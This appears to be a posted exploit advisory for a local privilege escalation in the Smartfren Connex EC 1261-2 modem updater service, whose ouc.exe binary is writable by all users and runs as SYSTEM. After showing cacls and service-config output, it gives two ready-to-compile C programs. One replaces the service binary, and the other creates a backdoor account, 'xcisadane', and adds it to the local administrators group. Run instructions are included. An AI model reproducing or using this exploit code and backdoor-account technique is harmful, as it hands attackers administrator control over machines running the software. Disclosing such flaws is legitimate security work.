Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files.
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.
Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice.
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges.
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
The following attack scenario could be used :
You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:\sploit.cpp
#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{
MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
return 0;
}
Compile these script below with Dev-C++
Save in the C:\bin.cpp
#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:\
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.
Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss…!